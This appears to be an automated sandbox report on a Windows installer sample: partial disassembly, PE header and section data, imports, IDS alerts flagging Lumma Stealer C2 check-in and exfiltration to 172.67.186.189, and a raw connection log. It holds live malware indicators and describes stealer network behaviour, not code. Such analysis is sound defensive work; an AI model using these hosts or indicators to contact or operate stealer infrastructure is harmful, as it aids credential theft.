                                                                                                                                                                            push 0040A24Ch
                                                                                                                                                                            push 00476AA0h
                                                                                                                                                                            call 00007F9A9D5146DDh
                                                                                                                                                                            call dword ptr [004090B0h]
                                                                                                                                                                            push eax
                                                                                                                                                                            mov edi, 004CF0A0h
                                                                                                                                                                            push edi
                                                                                                                                                                            call 00007F9A9D5146CBh
                                                                                                                                                                            push ebp
                                                                                                                                                                            call dword ptr [00409134h]
                                                                                                                                                                            cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                            mov dword ptr [0047EAB8h], eax
                                                                                                                                                                            mov eax, edi
                                                                                                                                                                            jne 00007F9A9D511FCAh
                                                                                                                                                                            push 00000022h
                                                                                                                                                                            pop esi
                                                                                                                                                                            mov eax, 004CF0A2h
                                                                                                                                                                            push esi
                                                                                                                                                                            push eax
                                                                                                                                                                            call 00007F9A9D5143A1h
                                                                                                                                                                            push eax
                                                                                                                                                                            call dword ptr [00409260h]
                                                                                                                                                                            mov esi, eax
                                                                                                                                                                            mov dword ptr [esp+1Ch], esi
                                                                                                                                                                            jmp 00007F9A9D512053h
                                                                                                                                                                            push 00000020h
                                                                                                                                                                            pop ebx
                                                                                                                                                                            cmp ax, bx
                                                                                                                                                                            jne 00007F9A9D511FCAh
                                                                                                                                                                            add esi, 02h
                                                                                                                                                                            cmp word ptr [esi], bx
                                                                                                                                                                            Programming Language:
                                                                                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                                                                                                            • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x3210e.rsrc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x46000200x24d0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                            .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                            .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                            .rsrc0x1000000x3210e0x322000f21167f0af9bac84fe5f2fc0f537099False0.949608400872818data7.842128001448306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .reloc0x1330000xfd60x100002f92148b093633a3107bbd435f8faffFalse0.568603515625data5.326683697973451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                            RT_ICON0x1002c80x222b0PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9765705384703327
                                                                                                                                                                            RT_ICON0x1225780x8edcPNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9978125341791535
                                                                                                                                                                            RT_ICON0x12b4540x289fPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0010577940186556
                                                                                                                                                                            RT_ICON0x12dcf40x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.6275427176566314
                                                                                                                                                                            RT_ICON0x13035c0x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.686247723132969
                                                                                                                                                                            RT_ICON0x1314840x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8812056737588653
                                                                                                                                                                            RT_DIALOG0x1318ec0x100dataEnglishUnited States0.5234375
                                                                                                                                                                            RT_DIALOG0x1319ec0x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                            RT_DIALOG0x131b080x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                            RT_GROUP_ICON0x131b680x5adataEnglishUnited States0.7888888888888889
                                                                                                                                                                            RT_VERSION0x131bc40x274dataEnglishUnited States0.5079617834394905
                                                                                                                                                                            RT_MANIFEST0x131e380x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                                                            DLLImport
                                                                                                                                                                            KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                            USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                            SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                            ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                            EnglishUnited States
                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                            2024-12-22T23:28:44.992703+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549760172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:28:45.767273+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549760172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:28:45.767273+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549760172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:28:46.999528+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549766172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:28:47.780519+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549766172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:28:47.780519+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549766172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:28:49.412750+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549775172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:28:50.654793+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549775172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:28:51.931764+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549782172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:28:54.195683+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549788172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:28:56.669995+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549794172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:28:58.952601+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549799172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:29:01.468180+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549805172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:29:01.474167+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549805172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:29:05.112090+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549816172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:29:05.877554+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549816172.67.186.189443TCP
                                                                                                                                                                            2024-12-22T23:29:11.147526+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549823194.58.112.174443TCP
                                                                                                                                                                            2024-12-22T23:29:17.590806+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549846172.67.191.144443TCP
                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Dec 22, 2024 23:28:43.776015043 CET49760443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:43.776078939 CET44349760172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:43.776202917 CET49760443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:43.777878046 CET49760443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:43.777904987 CET44349760172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:44.992486000 CET44349760172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:44.992702961 CET49760443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:44.994105101 CET49760443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:44.994126081 CET44349760172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:44.994343042 CET44349760172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:45.040833950 CET49760443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:45.047408104 CET49760443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:45.047445059 CET49760443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:45.047487020 CET44349760172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:45.767292976 CET44349760172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:45.767427921 CET44349760172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:45.767501116 CET49760443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:45.776856899 CET49760443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:45.776886940 CET44349760172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:45.776917934 CET49760443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:45.776935101 CET44349760172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:45.785418034 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:45.785470963 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:45.785568953 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:45.785837889 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:45.785851002 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:46.999456882 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:46.999527931 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.001204967 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.001214981 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.001518011 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.002854109 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.002880096 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.002919912 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.780529976 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.780577898 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.780606985 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.780625105 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.780632019 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.780653000 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.780678988 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.785437107 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.785480976 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.785495043 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.793920040 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.793963909 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.793983936 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.837580919 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.837599039 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.884453058 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.900332928 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.904203892 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.904261112 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.904273987 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.946950912 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.972482920 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.976284981 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.976339102 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.976350069 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.983838081 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.983894110 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.983901024 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.983915091 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.983983994 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.984169006 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.984186888 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:47.984199047 CET49766443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:47.984205961 CET44349766172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:48.191580057 CET49775443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:48.191689968 CET44349775172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:48.191778898 CET49775443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:48.192140102 CET49775443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:48.192193985 CET44349775172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:49.412653923 CET44349775172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:49.412750006 CET49775443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:49.413898945 CET49775443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:49.413913965 CET44349775172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:49.414252043 CET44349775172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:49.415509939 CET49775443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:49.415647984 CET49775443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:49.415684938 CET44349775172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:50.654822111 CET44349775172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:50.655113935 CET44349775172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:50.655189991 CET49775443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:50.655304909 CET49775443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:50.655361891 CET44349775172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:50.710551023 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:50.710606098 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:50.710686922 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:50.710942984 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:50.710975885 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:51.931597948 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:51.931763887 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:51.933150053 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:51.933177948 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:51.933823109 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:51.934995890 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:51.935137033 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:51.935187101 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:51.935260057 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:51.979324102 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:52.795180082 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:52.795489073 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:52.795593977 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:52.795743942 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:52.795773983 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:52.971522093 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:52.971621037 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:52.971756935 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:52.972067118 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:52.972100973 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:54.195590973 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:54.195683002 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:54.197326899 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:54.197345018 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:54.197841883 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:54.199209929 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:54.199373007 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:54.199435949 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:54.199522018 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:54.199537039 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:55.131206036 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:55.131485939 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:55.131565094 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:55.131644964 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:55.131668091 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:55.446520090 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:55.446607113 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:55.446702003 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:55.447058916 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:55.447089911 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:56.669915915 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:56.669995070 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:56.671057940 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:56.671087027 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:56.671449900 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:56.672528982 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:56.672646046 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:56.672684908 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:57.706228018 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:57.706453085 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:57.706631899 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:57.706732988 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:57.706772089 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:57.730092049 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:57.730130911 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:57.730223894 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:57.730482101 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:57.730496883 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:58.952382088 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:58.952600956 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:58.953531981 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:58.953540087 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:58.954035997 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:58.955557108 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:58.955687046 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:58.955693007 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:59.745860100 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:59.746149063 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:59.746361971 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:59.746484041 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:59.746496916 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:00.240720034 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:00.240801096 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:00.240993023 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:00.241328001 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:00.241358995 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.468075991 CET44349805172.67.186.189192.168.2.5
